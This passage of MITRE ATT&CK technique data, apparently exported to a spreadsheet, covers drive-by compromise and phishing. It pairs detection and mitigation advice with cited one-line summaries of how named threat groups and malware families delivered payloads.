[Transparent Tribe](https://attack.mitre.org/groups/G0134) has used websites with malicious hyperlinks and iframes to infect targeted victims with [Crimson](https://attack.mitre.org/software/S0115), [njRAT](https://attack.mitre.org/software/S0385), and other malicious tools.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Unit 42 ProjectM March 2016)(Citation: Talos Transparent Tribe May 2021)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has infected victims using watering holes.(Citation: ESET ComRAT May 2020)(Citation: Secureworks IRON HUNTER Profile)
Windigo
[Windigo](https://attack.mitre.org/groups/G0124) has distributed Windows malware via drive-by downloads.(Citation: ESET Windigo Mar 2014)
Windshift
[Windshift](https://attack.mitre.org/groups/G0112) has used compromised websites to register custom URL schemes on a remote system.(Citation: objective-see windtail1 dec 2018)
Bad Rabbit
[Bad Rabbit](https://attack.mitre.org/software/S0606) spread through watering holes on popular sites by injecting JavaScript into the HTML body or a &lt;code&gt;.js&lt;/code&gt; file.(Citation: ESET Bad Rabbit)(Citation: Secure List Bad Rabbit)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) has been spread through malicious advertisements on websites.(Citation: MacKeeper Bundlore Apr 2019)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) has used compromised websites and Google Ads to bait victims into downloading its installer.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: IBM Grandoreiro April 2020)
KARAE
[KARAE](https://attack.mitre.org/software/S0215) was distributed through torrent file-sharing websites to South Korean victims, using a YouTube video downloader application as a lure.(Citation: FireEye APT37 Feb 2018)
LoudMiner
[LoudMiner](https://attack.mitre.org/software/S0451) is typically bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)
POORAIM
[POORAIM](https://attack.mitre.org/software/S0216) has been delivered through compromised sites acting as watering holes.(Citation: FireEye APT37 Feb 2018)
REvil
[REvil](https://attack.mitre.org/software/S0496) has infected victim machines through compromised websites and exploit kits.(Citation: Secureworks REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks GandCrab and REvil September 2019)
Snip3
[Snip3](https://attack.mitre.org/software/S1086) has been delivered to targets via downloads from malicious domains.(Citation: Telefonica Snip3 December 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor call logs from corporate devices to identify patterns of potential voice phishing, such as calls to/from known malicious phone numbers. Correlate these records with system events.
User Training
Users can be trained to identify and report social engineering techniques and spearphishing attempts, while also being suspicious of and verifying the identify of callers.(Citation: CISA Phishing)
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) impersonated legitimate IT personnel in phone calls to direct victims to download a remote monitoring and management (RMM) tool that would allow the adversary to remotely control their system.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
</t>
  </si>
  <si>
    <t>Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Monitor for suspicious descendant process spawning from Microsoft Office and other productivity software.(Citation: Elastic - Koadiac Detection with EQL)
File Creation
Monitor for newly constructed files from a spearphishing emails with a malicious attachment in an attempt to gain access to victim systems.
Network Traffic Content
Monitor and analyze SSL/TLS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Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
Antivirus/Antimalware
Anti-virus can also automatically quarantine suspicious files.
Network Intrusion Prevention
Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity.
Restrict Web-Based Content
Block unknown or unused attachments by default that should not be transmitted over email as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc. Some email scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious attachments.
Software Configuration
Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using SPF) and integrity of messages (using DKIM). Enabling these mechanisms within an organization (through policies such as DMARC) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
User Training
Users can be trained to identify social engineering techniques and spearphishing emails.
2015 Ukraine Electric Power Attack
During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) obtained their initial foothold into many IT systems using Microsoft Office attachments delivered through phishing emails. (Citation: Ukraine15 - EISAC - 201603)
C0011
During [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) sent malicious attachments via email to student targets in India.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022) 
C0015
For [C0015](https://attack.mitre.org/campaigns/C0015), security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims.(Citation: DFIR Conti Bazar Nov 2021)
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors likely used spearphishing emails to send malicious Microsoft Word documents.(Citation: Talos Frankenstein June 2019)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) sent emails with malicious attachments to gain unauthorized access to targets' computers.(Citation: ClearSky Lazarus Aug 2020)(Citation: McAfee Lazarus Jul 2020)
Operation Dust Storm
During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors sent spearphishing emails that contained a malicious Microsoft Word document.(Citation: Cylance Dust Storm)
Operation Spalax
During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors sent phishing emails that included a PDF document that in some cases led to the download and execution of malware.(Citation: ESET Operation Spalax Jan 2021)
APT-C-36
[APT-C-36](https://attack.mitre.org/groups/G0099) has used spearphishing emails with password protected RAR attachment to avoid being detected by the email gateway.(Citation: QiAnXin APT-C-36 Feb2019) 
APT1
[APT1](https://attack.mitre.org/groups/G0006) has sent spearphishing emails containing malicious attachments.(Citation: Mandiant APT1)
APT12
[APT12](https://attack.mitre.org/groups/G0005) has sent emails with malicious Microsoft Office documents and PDFs attached.(Citation: Moran 2014)(Citation: Trend Micro IXESHE 2012)
APT19
[APT19](https://attack.mitre.org/groups/G0073) sent spearphishing emails with malicious attachments in RTF and XLSM formats to deliver initial exploits.(Citation: FireEye APT19)
APT28
[APT28](https://attack.mitre.org/groups/G0007) sent spearphishing emails containing malicious Microsoft Office and RAR attachments.(Citation: Unit 42 Sofacy Feb 2018)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: DOJ GRU Indictment Jul 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used spearphishing emails with an attachment to deliver files with exploits to initial victims.(Citation: F-Secure The Dukes)(Citation: MSTIC NOBELIUM May 2021)(Citation: ESET T3 Threat Report 2021)(Citation: Secureworks IRON HEMLOCK Profile)
APT30
[APT30](https://attack.mitre.org/groups/G0013) has used spearphishing emails with malicious DOC attachments.(Citation: FireEye APT30)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has sent spearphishing emails with a malicious executable disguised as a document or spreadsheet.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: FireEye APT32 April 2020)(Citation: Amnesty Intl. Ocean Lotus February 2021)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has sent spearphishing e-mails with archive attachments.(Citation: Microsoft Holmium June 2020)
APT37
[APT37](https://attack.mitre.org/groups/G0067) delivers malware using spearphishing emails with malicious HWP attachments.(Citation: FireEye APT37 Feb 2018)(Citation: Talos Group123)(Citation: Securelist ScarCruft May 2019)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has conducted spearphishing campaigns using malicious email attachments.(Citation: CISA AA20-239A BeagleBoyz August 2020)
APT39
[APT39](https://attack.mitre.org/groups/G0087) leveraged spearphishing emails with malicious attachments to initially compromise victims.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer February 2018)(Citation: FBI FLASH APT39 September 2020)
APT41
[APT41](https://attack.mitre.org/groups/G0096) sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.(Citation: FireEye APT41 Aug 2019)
Ajax Security Team
[Ajax Security Team](https://attack.mitre.org/groups/G0130) has used personalized spearphishing attachments.(Citation: Check Point Rocket Kitten)
Andariel
[Andariel](https://attack.mitre.org/groups/G0138) has conducted spearphishing campaigns that included malicious Word or Excel attachments.(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)(Citation: MalwareBytes Lazarus-Andariel Conceals Code April 2021)
BITTER
[BITTER](https://attack.mitre.org/groups/G1002) has sent spearphishing emails with a malicious RTF document or Excel spreadsheet.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) used spearphishing emails with malicious Microsoft Word attachments to infect victims.(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)
BlackTech
[BlackTech](https://attack.mitre.org/groups/G0098) has used spearphishing e-mails with malicious password-protected archived files (ZIP or RAR) to deliver malware.(Citation: TrendMicro BlackTech June 2017)(Citation: NTT Security Flagpro new December 2021)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc, .xls, archives containing LNK files, and password protected archives containing .exe and .scr executables.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)(Citation: Proofpoint Cobalt June 2017)(Citation: RiskIQ Cobalt Nov 2017)(Citation: Unit 42 Cobalt Gang Oct 2018)(Citation: TrendMicro Cobalt Group Nov 2017)
Confucius
[Confucius](https://attack.mitre.org/groups/G0142) has crafted and sent victims malicious attachments to gain initial access.(Citation: Uptycs Confucius APT Jan 2021)
DarkHydrus
[DarkHydrus](https://attack.mitre.org/groups/G0079) has sent spearphishing emails with password-protected RAR archives containing malicious Excel Web Query files (.iqy). The group has also sent spearphishing emails that contained malicious Microsoft Office documents that use the “attachedTemplate” technique to load a template from a remote server.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit 42 Phishery Aug 2018)(Citation: Unit 42 Playbook Dec 2017)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) has sent spearphishing emails with malicious RAR and .LNK attachments.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM July 2016)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has sent emails with malicious attachments to gain initial access.(Citation: Gigamon Berserk Bear October 2021)
EXOTIC LILY
[EXOTIC LILY](https://attack.mitre.org/groups/G1011) conducted an e-mail thread-hijacking campaign with malicious ISO attachments.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)
Elderwood
[Elderwood](https://attack.mitre.org/groups/G0066) has delivered zero-day exploits and malware to victims via targeted emails containing malicious attachments.(Citation: Symantec Elderwood Sept 2012)(Citation: CSM Elderwood Sept 2012)
Ember Bear
[Ember Bear](https://attack.mitre.org/groups/G1003) has sent spearphishing emails containing malicious attachments in the form of PDFs, Word documents, JavaScript files, and Control Panel File (CPL) executables.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ) 
FIN4
[FIN4](https://attack.mitre.org/groups/G0085) has used spearphishing emails containing attachments (which are often stolen, legitimate documents sent from compromised accounts) with embedded malicious macros.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has targeted victims with e-mails containing malicious attachments.(Citation: Visa FIN6 Feb 2019)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) sent spearphishing emails with either malicious Microsoft Documents or RTF files attached.(Citation: FireEye FIN7 April 2017)(Citation: DOJ FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: eSentire FIN7 July 2021)(Citation: CrowdStrike Carbon Spider August 2021)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has distributed targeted emails containing Word documents with embedded malicious macros.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
Ferocious Kitten
[Ferocious Kitten](https://attack.mitre.org/groups/G0137) has conducted spearphishing campaigns containing malicious documents to lure victims to open the attachments.(Citation: Kaspersky Ferocious Kitten Jun 2021)
Gallmaker
[Gallmaker](https://attack.mitre.org/groups/G0084) sent emails with malicious Microsoft Office documents attached.(Citation: Symantec Gallmaker Oct 2018)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has delivered spearphishing emails with malicious attachments to targets.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: CERT-EE Gamaredon January 2021)(Citation: Microsoft Actinium February 2022)(Citation: Unit 42 Gamaredon February 2022)(Citation: Secureworks IRON TILDEN Profile)
Gorgon Group
[Gorgon Group](https://attack.mitre.org/groups/G0078) sent emails to victims with malicious Microsoft Office documents attached.(Citation: Unit 42 Gorgon Group Aug 2018)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) has sent spearphishing emails containing malicious attachments.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020) 
Inception
[Inception](https://attack.mitre.org/groups/G0100) has used weaponized documents attached to spearphishing emails for reconnaissance and initial compromise.(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Symantec Inception Framework March 2018)(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)
IndigoZebra
[IndigoZebra](https://attack.mitre.org/groups/G0136) sent spearphishing emails containing malicious password-protected RAR attachments.(Citation: HackerNews IndigoZebra July 2021)(Citation: Checkpoint IndigoZebra July 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used emails containing Word, Excel and/or HWP (Hangul Word Processor) documents in their spearphishing campaigns.(Citation: Zdnet Kimsuky Dec 2018)(Citation: Securelist Kimsuky Sept 2013)(Citation: ThreatConnect Kimsuky September 2020)(Citation: VirusBulletin Kimsuky October 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: Talos Kimsuky Nov 2021)(Citation: KISA Operation Muzabi)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has targeted victims with spearphishing emails containing malicious Microsoft Word documents.(Citation: McAfee Bankshot)(Citation: Kaspersky ThreatNeedle Feb 2021)(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)
LazyScripter
[LazyScripter](https://attack.mitre.org/groups/G0140) has used spam emails weaponized with archive or document files as its initial infection vector.(Citation: MalwareBytes LazyScripter Feb 2021)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has sent spearphishing emails with malicious attachments, including .rtf, .doc, and .xls files.(Citation: Proofpoint Leviathan Oct 2017)(Citation: CISA AA21-200A APT40 July 2021)
Machete
 [Machete](https://attack.mitre.org/groups/G0095) has delivered spearphishing emails that contain a zipped file with malicious contents.(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)
Mofang
[Mofang](https://attack.mitre.org/groups/G0103) delivered spearphishing emails with malicious documents, PDFs, or Excel files attached.(Citation: FOX-IT May 2016 Mofang)
Molerats
[Molerats](https://attack.mitre.org/groups/G0021) has sent phishing emails with malicious Microsoft Word and PDF attachments.(Citation: Kaspersky MoleRATs April 2019)(Citation: Unit42 Molerat Mar 2020)(Citation: Cybereason Molerats Dec 2020)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)	(Citation: DHS CISA AA22-055A MuddyWater February 2022)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has used spearphishing attachments to deliver initial access payloads.(Citation: Recorded Future REDDELTA July 2020)(Citation: Proofpoint TA416 November 2020)(Citation: Google TAG Ukraine Threat Landscape March 2022)
Naikon
[Naikon](https://attack.mitre.org/groups/G0019) has used malicious e-mail attachments to deliver malware.(Citation: CheckPoint Naikon May 2020)
Nomadic Octopus
[Nomadic Octopus](https://attack.mitre.org/groups/G0133) has targeted victims with spearphishing emails containing malicious attachments.(Citation: Security Affairs DustSquad Oct 2018)(Citation: ESET Nomadic Octopus 2018)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has sent spearphising emails with malicious attachments to potential victims using compromised and/or spoofed email accounts.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 QUADAGENT July 2018)(Citation: Crowdstrike Helix Kitten Nov 2018)
PLATINUM
[PLATINUM](https://attack.mitre.org/groups/G0068) has sent spearphishing emails with attachments to victims as its primary initial access vector.(Citation: Microsoft PLATINUM April 2016)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) has used spearphishing with an attachment to deliver files with exploits to initial victims.(Citation: Cymmetria Patchwork)(Citation: Securelist Dropping Elephant)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)
RTM
[RTM](https://attack.mitre.org/groups/G0048) has used spearphishing attachments to distribute its malware.(Citation: Group IB RTM August 2019)
Rancor
[Rancor](https://attack.mitre.org/groups/G0075) has attached a malicious document to an email to gain initial access.(Citation: Rancor Unit42 June 2018)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has delivered malicious Microsoft Office attachments via spearphishing emails.(Citation: iSight Sandworm Oct 2014)(Citation: US-CERT Ukraine Feb 2016)(Citation: ESET Telebots Dec 2016)(Citation: US District Court Indictment GRU Unit 74455 October 2020)
SideCopy
[SideCopy](https://attack.mitre.org/groups/G1008) has sent spearphishing emails with malicious hta file attachments.(Citation: MalwareBytes SideCopy Dec 2021)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has sent e-mails with malicious attachments often crafted for specific targets.(Citation: ATT Sidewinder January 2021)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has sent emails with malicious DOCX, CHM, LNK and ZIP attachments. (Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has sent phishing emails with malicious attachments for initial access including MS Word documents.(Citation: Proofpoint TA2541 February 2022)(Citation: Cisco Operation Layover September 2021)
TA459
[TA459](https://attack.mitre.org/groups/G0062) has targeted victims using spearphishing emails with malicious Microsoft Word attachments.(Citation: Proofpoint TA459 April 2017)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used spearphishing emails with malicious attachments to initially compromise victims.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)
TA551
[TA551](https://attack.mitre.org/groups/G0127) has sent spearphishing attachments with password protected ZIP files.(Citation: Unit 42 Valak July 2020)(Citation: Unit 42 TA551 Jan 2021)(Citation: Secureworks GOLD CABIN)
The White Company
[The White Company](https://attack.mitre.org/groups/G0089) has sent phishing emails with malicious Microsoft Word attachments to victims.(Citation: Cylance Shaheen Nov 2018)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used e-mail to deliver malicious attachments to victims.(Citation: Trend Micro DRBControl February 2020)
Tonto Team
[Tonto Team](https://attack.mitre.org/groups/G0131) has delivered payloads via spearphishing attachments.(Citation: TrendMicro Tonto Team October 2020)
Transparent Tribe
[Transparent Tribe](https://attack.mitre.org/groups/G0134) has sent spearphishing e-mails with attachments to deliver malicious payloads.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)(Citation: Unit 42 ProjectM March 2016)	 
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) sent spearphishing emails that contained malicious Microsoft Office and fake installer file attachments.(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro TropicTrooper 2015)(Citation: CitizenLab Tropic Trooper Aug 2018)(Citation: Anomali Pirate Panda April 2020)(Citation: TrendMicro Tropic Trooper May 2020)
WIRTE
[WIRTE](https://attack.mitre.org/groups/G0090) has sent emails to intended victims with malicious MS Word and Excel attachments.(Citation: Kaspersky WIRTE November 2021)
Windshift
[Windshift](https://attack.mitre.org/groups/G0112) has sent spearphishing emails with attachment to harvest credentials and deliver malware.(Citation: SANS Windshift August 2018)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used spearphishing attachments to deliver Microsoft documents containing macros or PDFs containing malicious links to download either [Emotet](https://attack.mitre.org/software/S0367), Bokbot, [TrickBot](https://attack.mitre.org/software/S0266), or [Bazar](https://attack.mitre.org/software/S0534).(Citation: CrowdStrike Grim Spider May 2019)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: Mandiant FIN12 Oct 2021)
admin@338
[admin@338](https://attack.mitre.org/groups/G0018) has sent emails with malicious Microsoft Office documents attached.(Citation: FireEye admin@338)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has sent malicious Office documents via email as part of spearphishing campaigns as well as executables disguised as documents.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)(Citation: FireEye APT10 Sept 2018)(Citation: District Court of NY APT10 Indictment December 2018)
Agent Tesla
The primary delivered mechanism for [Agent Tesla](https://attack.mitre.org/software/S0331) is through email phishing messages.(Citation: Bitdefender Agent Tesla April 2020) 
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) has been distributed to victims through malicious e-mail attachments.(Citation: Malwarebytes Kimsuky June 2021)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) has been delivered via malicious e-mail attachments.(Citation: Securelist Brazilian Banking Malware July 2020)
BADFLICK
[BADFLICK](https://attack.mitre.org/software/S0642) has been distributed via spearphishing campaigns containing malicious Microsoft Word documents.(Citation: Accenture MUDCARP March 2019)
BLINDINGCAN
[BLINDINGCAN](https://attack.mitre.org/software/S0520) has been delivered by phishing emails containing malicious Microsoft Office documents.(Citation: US-CERT BLINDINGCAN Aug 2020)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) is delivered via a malicious Word document inside a zip file.(Citation: CheckPoint Bandook Nov 2020)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has been delivered as malicious email attachments.(Citation: Talos Bisonal Mar 2020) 
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) has gained execution through luring users into opening malicious attachments.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)(Citation: Cybereason Bumblebee August 2022)(Citation: Medium Ali Salem Bumblebee April 2022)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) has been delivered by sending victims a phishing email containing a malicious .docx file.(Citation: Cybereason Chaes Nov 2020)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) has been delivered to victim's machines through malicious e-mail attachments.(Citation: Trend Micro DRBControl February 2020)
DanBot
[DanBot](https://attack.mitre.org/software/S1014) has been distributed within a malicious Excel attachment via spearphishing emails.(Citation: SecureWorks August 2019) 
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) has been distributed via spearphishing emails containing archive attachments, with file types such as .iso, .zip, .img, .dmg, and .tar, as well as through malicious documents.(Citation: Secureworks DarkTortilla Aug 2022)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) has been delivered via spearphishing emails that contain a malicious zip file.(Citation: Prevailion DarkWatchman 2021)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has been delivered by phishing emails containing attachments. (Citation: CIS Emotet Apr 2017)(Citation: Malwarebytes Emotet Dec 2017)(Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Talos Emotet Jan 2019)(Citation: Trend Micro Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)(Citation: Carbon Black Emotet Apr 2019)(Citation: IBM IcedID November 2017)
EnvyScout
[EnvyScout](https://attack.mitre.org/software/S0634) has been distributed via spearphishing as an email attachment.(Citation: MSTIC Nobelium Toolset May 2021)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) has been distributed via spearphishing as an email attachment.(Citation: NTT Security Flagpro new December 2021)
Hancitor
[Hancitor](https://attack.mitre.org/software/S0499) has been delivered via phishing emails with malicious attachments.(Citation: FireEye Hancitor)
IcedID
[IcedID](https://attack.mitre.org/software/S0483) has been delivered via phishing e-mails with malicious attachments.(Citation: Juniper IcedID June 2020)
JSS Loader
[JSS Loader](https://attack.mitre.org/software/S0648) has been delivered by phishing emails containing malicious Microsoft Excel attachments.(Citation: eSentire FIN7 July 2021)
Javali
[Javali](https://attack.mitre.org/software/S0528) has been delivered as malicious e-mail attachments.(Citation: Securelist Brazilian Banking Malware July 2020)
KOCTOPUS
[KOCTOPUS](https://attack.mitre.org/software/S0669) has been distributed via spearphishing emails with malicious attachments.(Citation: MalwareBytes LazyScripter Feb 2021)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has been delivered via spearphishing campaigns through a malicious Word document.(Citation: Malwarebytes Konni Aug 2021)
KOPILUWAK
[KOPILUWAK](https://attack.mitre.org/software/S1075) has been delivered to victims as a malicious email attachment.(Citation: Mandiant Suspected Turla Campaign February 2023)
Kerrdown
[Kerrdown](https://attack.mitre.org/software/S0585) has been distributed through malicious e-mail attachments.(Citation: Amnesty Intl. Ocean Lotus February 2021)
Lokibot
[Lokibot](https://attack.mitre.org/software/S0447) is delivered via a malicious XLS attachment contained within a spearhpishing email.(Citation: Talos Lokibot Jan 2021) 
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has been delivered to victims via emails with malicious HTML attachments.(Citation: FireEye Metamorfo Apr 2018)(Citation: ESET Casbaneiro Oct 2019) 
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) has been spread via e-mail campaigns utilizing malicious attachments.(Citation: Unit 42 NETWIRE April 2020)(Citation: Proofpoint NETWIRE December 2020)
OceanSalt
[OceanSalt](https://attack.mitre.org/software/S0346) has been delivered via spearphishing emails with Microsoft Office attachments.(Citation: McAfee Oceansalt Oct 2018)
Octopus
[Octopus](https://attack.mitre.org/software/S0340) has been delivered via spearsphishing emails.(Citation: ESET Nomadic Octopus 2018)
OutSteel
[OutSteel](https://attack.mitre.org/software/S1017) has been distributed as a malicious attachment within a spearphishing email.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) was distributed via malicious Word documents.(Citation: Talos PoetRAT April 2020)
Pony
[Pony](https://attack.mitre.org/software/S0453) has been delivered via spearphishing attachments.(Citation: Malwarebytes Pony April 2016)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) has spread through emails with malicious attachments.(Citation: Trend Micro Qakbot May 2020)(Citation: Kroll Qakbot June 2020)(Citation: Trend Micro Qakbot December 2020)(Citation: Cyberint Qakbot May 2021)(Citation: ATT QakBot April 2021)(Citation: Kaspersky QakBot September 2021)(Citation: Group IB Ransomware September 2020)(Citation: Deep Instinct Black Basta August 2022)
REvil
[REvil](https://attack.mitre.org/software/S0496) has been distributed via malicious e-mail attachments including MS Word Documents.(Citation: G Data Sodinokibi June 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Picus Sodinokibi January 2020)
ROKRAT
[ROKRAT](https://attack.mitre.org/software/S0240) has been delivered via spearphishing emails that contain a malicious Hangul Office or Microsoft Word document.(Citation: Malwarebytes RokRAT VBA January 2021)
RTM
[RTM](https://attack.mitre.org/software/S0148) has been delivered via spearphishing attachments disguised as PDF documents.(Citation: Unit42 Redaman January 2019)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) has been distributed through spearphishing emails with malicious attachments.(Citation: Antiy CERT Ramsay April 2020)
Rifdoor
[Rifdoor](https://attack.mitre.org/software/S0433) has been distributed in e-mails with malicious Excel or Word documents.(Citation: Carbon Black HotCroissant April 2020)
SVCReady
[SVCReady](https://attack.mitre.org/software/S1064) has been distributed via spearphishing campaigns containing malicious Mircrosoft Word documents.(Citation: HP SVCReady Jun 2022)
Saint Bot
[Saint Bot](https://attack.mitre.org/software/S1018) has been distributed as malicious attachments within spearphishing emails.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Snip3
